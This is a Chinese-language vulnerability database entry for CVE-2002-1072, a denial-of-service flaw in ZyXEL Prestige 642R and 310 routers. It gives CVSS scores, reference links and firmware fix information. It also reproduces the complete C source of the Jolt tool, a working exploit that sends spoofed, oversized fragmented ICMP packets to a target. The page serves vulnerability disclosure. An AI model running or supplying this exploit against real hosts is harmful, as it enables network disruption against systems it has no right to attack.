CVE-2002-1072
CVSS5.0
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:42
NMCOES    

[原文]ZyXEL Prestige 642R 2.50(FA.1) and Prestige 310 V3.25(M.01), allows remote attackers to cause a denial of service via an oversized, fragmented "jolt" style ICMP packet.


[CNNVD]Zyxel Prestige 642R路由器畸形TCP包远程拒绝服务攻击漏洞(CNNVD-200210-090)

        
        Zyxel Prestige 642R路由器使用ZyNOS S/W作为操作系统。
        Zyxel Prestige 642R路由器在处理畸形TCP包时存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        Zyxel Prestige 642R路由器在接收到由jolt(http://packetstorm.decepticons.org/exploits/DoS/jolt.c)工具产生的畸形TCP包时,会停止通信30秒,连续的发送此类信息包,可导致Zyxel Prestige 642R路由器停止响应,产生拒绝服务攻击。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/h:zyxel:prestige:642r
cpe:/h:zyxel:prestige:310

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1072
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1072
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-090
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5292
(VENDOR_ADVISORY)  BID  5292
http://www.iss.net/security_center/static/9655.php
(VENDOR_ADVISORY)  XF  zyxel-jolt-dos(9655)
http://online.securityfocus.com/archive/1/283999
(UNKNOWN)  BUGTRAQ  20020724 Denial of Service in ZyXEL prestige 642R w/ZyNOS v2.50(FA.1)
http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0036.html
(UNKNOWN)  VULNWATCH  20020724 [VulnWatch] Denial of Service in ZyXEL prestige 642R w/ZyNOS v2.50(FA.1)

- 漏洞信息

Zyxel Prestige 642R路由器畸形TCP包远程拒绝服务攻击漏洞
中危 其他
2002-10-04 00:00:00 2005-10-20 00:00:00
远程  
        
        Zyxel Prestige 642R路由器使用ZyNOS S/W作为操作系统。
        Zyxel Prestige 642R路由器在处理畸形TCP包时存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        Zyxel Prestige 642R路由器在接收到由jolt(http://packetstorm.decepticons.org/exploits/DoS/jolt.c)工具产生的畸形TCP包时,会停止通信30秒,连续的发送此类信息包,可导致Zyxel Prestige 642R路由器停止响应,产生拒绝服务攻击。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时没有合适的临时解决方法。
        厂商补丁:
        ZyXEL
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.zywall.com/

- 漏洞信息 (21637)

Zyxel Prestige 642R Router Malformed IP Packet Denial Of Service Vulnerability (EDBID:21637)
hardware dos
2002-07-24 Verified
0 Jeff w. Roberson
N/A [点击下载]
source: http://www.securityfocus.com/bid/5292/info

ZyXEL 642R and Prestige 310 routers have difficulties handling IP packets that are malformed. Reportedly, when ZyXEL routers receive a single specially malformed packet, they stop responding for exactly 30 seconds. 

ZyXEL 642R and Prestige 310 routers are reportedly affected by this vulnerability. It is possible that other ZyNOS-based routers are also affected by this vulnerability

/* Jolt 1.0 (c) 1997 by Jeff w. Roberson
 * Please, if you use my code give me credit.  Also, if i was the first to
 * find this glitch, please give me credit.  Thats all i ask.
 *
 * Ok so all this does is build a really fraggmented over sized packet
 * and once win95 gets it, and puts it back together it locks.  I send
 * multiple packets by default cause some times it takes a few packets to
 * totally freeze the host.  Maybe its spending processor time to figure
 * out how to put them back together?  I've had reports of people blue
 * screening from it tho so we'll let Microsoft's boys figure out exactly
 * what this does to 95.  As of now i haven't tested it on NT, but maybe
 * i will later ;).  All of this source wasn't origonally written by me
 * I just took one of the old programs to kill POSIX and SYSV based
 * systems and worked on it abit, then made it spoof =). 
 * VallaH  (yaway@hotmail.com)
 *
 *  Update: It apears to work on some older versions of mac os
 */

/* Yah this is for linux, but i like the BSD ip header better then linux's */
#define __BSD_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <string.h>
#include <arpa/inet.h>

int main(int argc, char **argv)
{
        int s,i;
        char buf[400];
        struct ip *ip = (struct ip *)buf;
        struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
        struct hostent *hp, *hp2;
        struct sockaddr_in dst;
        int offset;
        int on = 1;
	int num = 5;

        bzero(buf, sizeof buf);

        if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW )) < 0) {
                perror("socket");
                exit(1);
        }
        if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
                perror("IP_HDRINCL");
                exit(1);
        }
        if (argc < 3) {
		printf("Jolt v1.0 Yet ANOTHER windows95(And macOS!) glitch by VallaH (yaway@hotmail.com)\n");
                printf("\nusage: %s <dstaddr> <saddr> [number]\n",argv[0]);
		printf("\tdstaddr is the host your attacking\n");
		printf("\tsaddr is the host your spoofing from\n");
		printf("\tNumber is the number of packets to send, 5 is the default\n");
		printf("\nNOTE:  This is based on a bug that used to affect POSIX complient, and SYSV \n\t systems so its nothing new..\n");
		printf("\nGreets to Bill Gates! How do ya like this one? :-)\n");
                exit(1);
        }
        if (argc == 4) num = atoi(argv[3]);
    for (i=1;i<=num;i++) {

        if ((hp = gethostbyname(argv[1])) == NULL) {
                if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
                        fprintf(stderr, "%s: unknown host\n", argv[1]);
			exit(1);
                }
        } else {
                bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
        }

        if ((hp2 = gethostbyname(argv[2])) == NULL) {
                if ((ip->ip_src.s_addr = inet_addr(argv[2])) == -1) {
                        fprintf(stderr, "%s: unknown host\n", argv[2]);
                        exit(1);
                }
        } else {
                bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);
        }

        printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
        ip->ip_v = 4;
        ip->ip_hl = sizeof *ip >> 2;
        ip->ip_tos = 0;
        ip->ip_len = htons(sizeof buf);
        ip->ip_id = htons(4321);
        ip->ip_off = htons(0);
        ip->ip_ttl = 255;
        ip->ip_p = 1;
        ip->ip_csum = 0;                 /* kernel fills in */

        dst.sin_addr = ip->ip_dst;
        dst.sin_family = AF_INET;

        icmp->type = ICMP_ECHO;
        icmp->code = 0;
        icmp->checksum = htons(~(ICMP_ECHO << 8));
        for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
                ip->ip_off = htons(offset >> 3);
                if (offset < 65120)
                        ip->ip_off |= htons(0x2000);
                else
                        ip->ip_len = htons(418);  /* make total 65538 */
                if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
                                        sizeof dst) < 0) {
                        fprintf(stderr, "offset %d: ", offset);
                        perror("sendto");
                }
                if (offset == 0) {
                        icmp->type = 0;
                        icmp->code = 0;
                        icmp->checksum = 0;
                }
        }
    }
	return 0;
}		

- 漏洞信息

9983
ZyXEL Prestige 642R Oversized Fragmented ICMP Packet DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

The ZyXEL Prestige 642R DSL router (and possibly other ZyXEL routers) running ZyNOS versions 2.50(FA.1) contains a flaw that may allow a remote denial of service. The issue is triggered when a remote attacker send a single "jolt" packet to a vulnerable router, and will result in loss of availability for the device for a short period of time.

- 时间线

2002-07-24 Unknow
2002-07-24 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Zyxel Prestige 642R Router Malformed IP Packet Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 5292
Yes No
2002-07-24 12:00:00 2009-07-11 02:56:00
Discovery credited to 0x36@hushmail.com.

- 受影响的程序版本

ZyXEL Prestige 642R
ZyXEL Prestige 310

- 漏洞讨论

ZyXEL 642R and Prestige 310 routers have difficulties handling IP packets that are malformed. Reportedly, when ZyXEL routers receive a single specially malformed packet, they stop responding for exactly 30 seconds.

ZyXEL 642R and Prestige 310 routers are reportedly affected by this vulnerability. It is possible that other ZyNOS-based routers are also affected by this vulnerability

- 漏洞利用

The following exploit has been provided by Jeff w. Roberson:

- 解决方案

The vendor has reported that new firmware versions are available which resolve this issue. Customers are advised to contact their local ZyXEL distributor in order to obtain updates.

This issue is resolved in firmware versions P642R-11 v2.50(AJ.9)C0 and P310 v3.50(M.01).

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站